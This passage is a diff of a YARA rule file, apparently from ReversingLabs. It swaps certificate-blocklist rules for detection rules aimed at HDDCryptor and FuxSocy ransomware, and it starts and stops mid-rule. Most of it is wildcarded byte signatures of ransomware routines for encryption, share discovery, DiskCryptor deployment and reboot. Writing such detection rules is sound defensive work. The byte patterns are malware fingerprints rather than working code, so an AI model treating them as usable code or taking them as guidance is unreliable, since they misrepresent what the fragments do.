?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 66 83 7D + ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 66 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 66 FF 45 ?? 66 83 7D + ?? ?? 75 ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? + 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 95 ?? ?? ?? ?? 33 C9 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? + E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 + 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? + E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 + } + $write_zoldon_regkey = { + 55 8B EC 83 C4 ?? 53 56 33 DB 89 5D ?? 88 4D ?? 8B DA 8B F0 33 C0 55 68 ?? ?? ?? ?? + 64 FF 30 64 89 20 8D 45 ?? 8B D3 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D8 84 DB + 75 ?? 8D 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 89 45 ?? 80 7D ?? + ?? 74 ?? 83 7D ?? ?? 75 ?? 8D 45 ?? 50 8B 46 ?? 50 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 + 8B D3 8B C6 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 88 45 ?? EB + ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 8B 46 ?? 50 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? + ?? 50 8B D3 8B C6 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 88 45 + ?? 80 7D ?? ?? 74 ?? 83 7E ?? ?? 0F 95 C0 84 D8 74 ?? FF 76 ?? 68 ?? ?? ?? ?? FF 75 + ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 33 + C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 + } + $find_files_p1 = { + 55 8B EC 81 C4 ?? ?? ?? ?? 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? + ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ?? + 89 45 ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? + 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 + C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 + ?? 80 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 + 74 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? + ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 + 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B + } + $find_files_p2 = { + 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E9 + ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? + ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? E9 ?? ?? + ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D + 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? + ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? + ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? + 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D + 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? + ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? + ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 85 C0 0F 84 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 + ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Logika OOO" and pe.signatures[i].serial=="7b:e3:5d:02:5e:65:cc:7a:4e:e0:1f:72" and 1594976445<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($write_zoldon_regkey) and ( all of ($find_files_p*)) and ( all of ($main_encrypt_function_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_351Fe2Efdc0Ac56A0C822Cf8 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Hddcryptor : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects HDDCryptor ransomware." author = "ReversingLabs" - id = "ac6b7c6d-781b-5c91-80fe-b822ee00ea7f" - date = "2023-11-08" - modified = "2023-11-08" + id = "2c6a8ca3-0f7a-52b7-af6d-74fa9407feca" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4326-L4342" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "46b87c3531e01ba150f056ec3270564426363ef8c58256eeedbcab247c7625e4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.HDDCryptor.yara#L1-L157" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "47915f315bb4956507362f56024f5632cb1bcec569ceaf77fe9d7cb9c25d1d8a" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "HDDCryptor" + tc_detection_factor = 5 importance = 25 + strings: + $deploy_components = { + B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 6A ?? 53 0F 85 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ?? + ?? ?? ?? BA ?? ?? ?? ?? 8B CB 8B F0 E8 ?? ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ?? + ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ?? + ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB + E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? + ?? 6A ?? 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? + ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB 8B F0 E8 ?? + ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B + F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F8 6A ?? 0F + AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ?? + ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B F8 BA ?? ?? ?? + ?? 0F AF FE 8B CB E8 + } + $get_shares_info = { + E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? EB ?? FF 15 ?? ?? + ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 8D 44 24 ?? 50 C7 44 24 ?? + ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? + FF 15 + } + $encrypt_discs = { + 68 ?? ?? ?? ?? FF 74 24 ?? 0F 57 C0 66 0F 7F 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 33 C9 EB ?? 8D 49 ?? 0F B7 81 ?? ?? ?? ?? 66 89 84 0C ?? ?? ?? ?? 8D 49 ?? 66 + 85 C0 75 ?? 8D 8C 24 ?? ?? ?? ?? 83 C1 ?? 66 8B 41 ?? 8D 49 ?? 66 85 C0 75 ?? A1 ?? + ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 + ?? A1 ?? ?? ?? ?? 89 41 ?? 0F B7 05 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 66 89 41 + ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF + D7 B9 ?? ?? ?? ?? E8 + } + $create_diskcryptor_service = { + 83 EC ?? 53 55 56 57 68 ?? ?? ?? ?? 33 ED 8B F2 55 55 8B F9 FF 15 ?? ?? ?? ?? 85 C0 + 74 ?? 55 55 55 55 55 FF 74 24 ?? 55 6A ?? 5B 53 6A ?? 68 ?? ?? ?? ?? 56 57 50 FF 15 + ?? ?? ?? ?? 8B F0 89 5C 24 ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 33 + C9 89 44 24 ?? 41 8D 44 24 ?? 89 4C 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 53 56 89 4C 24 + ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? FF 15 ?? ?? ?? ?? 8B C6 5F 5E 5D 5B 83 C4 ?? + C3 + } + $extract_diskcryptor_from_resources = { + 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 8B B4 24 ?? ?? + ?? ?? 33 C0 57 50 89 54 24 ?? 8B E9 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B D8 56 + 0F B7 C9 51 53 FF 15 ?? ?? ?? ?? 8B F0 56 53 FF 15 ?? ?? ?? ?? 56 53 8B F8 FF 15 ?? + ?? ?? ?? 57 89 44 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B F0 E8 ?? ?? ?? ?? 59 FF 74 + 24 ?? 8B D8 56 53 E8 ?? ?? ?? ?? 8B 54 24 ?? 33 FF 83 C4 ?? 8B CF 85 D2 7E ?? 8A 04 + 19 3C ?? 7C ?? 3C ?? 7F ?? 04 ?? 3C ?? 76 ?? 2C ?? 88 04 19 41 3B CA 7C ?? 33 C0 68 + ?? ?? ?? ?? 66 89 44 24 ?? 8D 44 24 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F5 66 8B 45 + ?? 83 C5 ?? 66 3B C7 75 ?? 8D 7C 24 ?? 2B EE 83 EF ?? 33 C9 66 8B 47 ?? 83 C7 ?? 66 + 3B C1 75 ?? 8B CD C1 E9 ?? F3 A5 8B CD 83 E1 ?? F3 A4 8D 7C 24 ?? 83 EF ?? 33 ED 66 + 8B 47 ?? 8D 7F ?? 66 3B C5 75 ?? A1 ?? ?? ?? ?? 8B 54 24 ?? 8B F2 89 07 66 8B 02 83 + C2 ?? 66 3B C5 75 ?? 8D 7C 24 ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C5 75 ?? + 8B CA 8D 44 24 ?? C1 E9 ?? F3 A5 55 55 6A ?? 55 55 8B CA 83 E1 ?? 68 ?? ?? ?? ?? F3 + A4 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 55 8D 44 24 ?? 50 FF 74 24 ?? 53 56 FF + 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 33 C0 40 EB ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 + C0 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 + } + $encrypt_files_using_diskcryptor_p1 = { + 55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? + ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ?? + ?? ?? 64 A3 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 83 7D ?? ?? 73 ?? B9 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? + ?? ?? ?? 8B 75 ?? BA ?? ?? ?? ?? 8B 4E ?? 8A 01 41 88 02 42 84 C0 75 ?? 8B 4E ?? BA + ?? ?? ?? ?? 8A 01 41 88 02 42 84 C0 75 ?? 6A ?? 59 BE ?? ?? ?? ?? C7 05 ?? ?? ?? ?? + ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ?? + 33 F6 8D 84 24 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 89 B4 24 ?? ?? ?? ?? + 8D 4C 24 ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4C 24 ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 7C 24 ?? ?? 8D 44 24 ?? 56 0F 43 44 24 ?? 56 6A ?? 56 56 68 ?? ?? ?? ?? 50 FF + 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 33 DB C7 44 + } + $encrypt_files_using_diskcryptor_p2 = { + 24 ?? ?? ?? ?? ?? 50 89 5C 24 ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? + ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B D0 59 59 85 D2 + 75 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 59 8B D0 8D BC 24 ?? ?? ?? ?? 83 EF ?? 66 + 8B 47 ?? 8D 7F ?? 66 3B C3 75 ?? A1 ?? ?? ?? ?? 83 C2 ?? 89 07 8B F2 66 8B 02 83 C2 + ?? 66 3B C3 75 ?? 8D BC 24 ?? ?? ?? ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C3 + 75 ?? 8B CA 8D 84 24 ?? ?? ?? ?? C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 51 50 83 EC ?? + 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 84 + 24 ?? ?? ?? ?? ?? 83 7E ?? ?? 72 ?? 8B 36 83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 8B D6 8B C8 + E8 ?? ?? ?? ?? 59 59 53 6A ?? 8D 4C 24 ?? 8B F0 E8 ?? ?? ?? ?? 53 6A ?? 8D 4C 24 ?? + C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 74 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B F3 EB ?? FF 15 ?? ?? ?? ?? 8B F0 53 6A ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? + 8B C6 EB ?? 53 6A ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 8B 8C 24 ?? ?? ?? ?? 64 89 0D + ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $reboot = { + 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? + ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 EB ?? 8D 45 ?? 33 F6 50 68 ?? ?? ?? ?? 56 + FF 15 ?? ?? ?? ?? 56 56 56 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 FF 75 ?? C7 45 ?? ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 + ?? ?? ?? ?? F7 D8 1B C0 F7 D8 8B 4D ?? 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Logika OOO" and pe.signatures[i].serial=="35:1f:e2:ef:dc:0a:c5:6a:0c:82:2c:f8" and 1594976475<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ((($deploy_components) and ($get_shares_info) and ($encrypt_discs)) or (($extract_diskcryptor_from_resources) and ($create_diskcryptor_service) and ( all of ($encrypt_files_using_diskcryptor_p*)) and ($reboot))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_9Cfbb4C69008821Aaacecde97Ee149Ab : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Fuxsocy : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects FuxSocy ransomware." author = "ReversingLabs" - id = "a8ba633b-fbbe-51ca-9f67-fb91ce9ac2f7" - date = "2023-11-08" - modified = "2023-11-08" + id = "f4a45469-9d51-523f-8238-c7044f353cf6" + date = "2021-03-01" + modified = "2021-03-01" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4344-L4362" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d74b13eeb5d0a57c5dd3257480230c504a68a8422e77a46bb2e101abb2c7f282" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.FuxSocy.yara#L1-L114" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8b3c04eb5d60fcc82e47cb8e78da0a98642666546d6799baef24b56926e3aceb" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "FuxSocy" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_1 = { + 83 EC ?? 53 55 57 89 54 24 ?? 8B 54 24 ?? 51 33 DB E8 ?? ?? ?? ?? 8B E8 59 85 ED 0F + 84 ?? ?? ?? ?? 8B 44 24 ?? 89 5C 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B CB E9 + ?? ?? ?? ?? 53 53 FF 74 24 ?? 41 FF 74 24 ?? BF ?? ?? ?? ?? FF 74 24 ?? 3B C7 0F 42 + F8 2B C7 89 4C 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 53 8D 44 24 ?? 50 57 FF 74 24 ?? + FF 74 24 ?? FF 15 ?? ?? ?? ?? 57 FF 74 24 ?? 8D 54 24 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? + 59 59 57 8D 44 24 ?? 50 FF 74 24 ?? 33 C0 39 44 24 ?? 53 0F 94 C0 89 7C 24 ?? 50 53 + 55 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 53 FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 15 ?? + ?? ?? ?? 53 8D 44 24 ?? 50 57 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 01 7C 24 ?? + 8B 4C 24 ?? 11 5C 24 ?? F6 C1 ?? 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B 44 24 + ?? 85 C0 0F 85 ?? ?? ?? ?? EB ?? 88 5C 24 ?? FF 74 24 ?? 8B 54 24 ?? 8B 4C 24 ?? E8 + ?? ?? ?? ?? 59 8B 4C 24 ?? 55 89 41 ?? FF 15 ?? ?? ?? ?? 8A 5C 24 ?? 5F 5D 8A C3 5B + 83 C4 ?? C3 + } + $encrypt_files_2 = { + 83 EC ?? 53 55 56 8B 74 24 ?? 8B C1 8B 36 57 89 54 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? + 8B F8 33 D2 8D 5F ?? 8B C6 F7 F3 33 C9 85 D2 0F 95 C1 89 54 24 ?? 33 D2 03 C8 89 4C + 24 ?? 0F AF CF 89 4C 24 ?? E8 ?? ?? ?? ?? 8B E8 89 6C 24 ?? 85 ED 0F 84 ?? ?? ?? ?? + 33 D2 8B CF E8 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83 64 24 ?? ?? + 48 89 6C 24 ?? 89 44 24 ?? 74 ?? 53 FF 74 24 ?? 89 5C 24 ?? 56 E8 ?? ?? ?? ?? 83 C4 + ?? 8D 44 24 ?? 57 50 56 33 C0 50 50 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? + ?? ?? ?? 33 C9 85 FF 74 ?? 8B 54 24 ?? 8D 6E ?? 03 EF 8A 45 ?? 4D 88 04 11 41 3B CF + 72 ?? 8B 6C 24 ?? 8B 44 24 ?? 03 44 24 ?? 01 5C 24 ?? 89 44 24 ?? 8B 44 24 ?? 40 89 + 44 24 ?? 3B 44 24 ?? 72 ?? 8B 44 24 ?? 85 C0 0F 45 D8 53 FF 74 24 ?? 89 5C 24 ?? 56 + E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 57 50 56 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF 15 ?? + ?? ?? ?? 8B D8 F7 DB 1A DB 80 E3 ?? 33 C9 85 FF 74 ?? 8B 6C 24 ?? 8D 56 ?? 03 D7 8A + 02 4A 88 04 29 41 3B CF 72 ?? 8B 6C 24 ?? 8B CE E8 ?? ?? ?? ?? 84 DB 75 ?? 8B CD E8 + ?? ?? ?? ?? 33 ED EB ?? 32 DB EB ?? 8B 4C 24 ?? 8B 44 24 ?? 89 01 5F 5E 8B C5 5D 5B + 83 C4 ?? C3 + } + $find_files_1 = { + 81 EC ?? ?? ?? ?? 53 56 57 8B BC 24 ?? ?? ?? ?? 8B F2 89 74 24 ?? 8B D9 85 FF 0F 84 + ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B D7 C1 E2 ?? 8B + CE E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 + 0F 84 ?? ?? ?? ?? 